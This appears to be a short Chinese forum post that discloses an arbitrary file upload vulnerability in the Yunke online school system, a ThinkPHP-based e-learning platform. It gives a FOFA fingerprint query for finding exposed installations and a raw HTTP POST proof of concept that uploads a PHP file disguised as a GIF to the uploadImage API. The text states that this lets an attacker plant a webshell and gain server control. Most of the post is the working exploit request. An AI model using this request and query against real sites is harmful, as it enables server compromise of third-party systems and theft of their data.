云课网校系统是一款基于ThinkPhP框架的网校系统,包含直播,点播,考试,问答,论坛,文章等模块,是一款最具性价比的线上学习系统。该系统存在任意文件上传漏洞,攻击者可以直接上传webshell文件获取服务器权限
FOFA语句:
"/static/libs/common/jquery.stickyNavbar.min.js"
POC:
POST /api/uploader/uploadImage HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="tets.php"
Content-Type: image/gif
<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
没有回复内容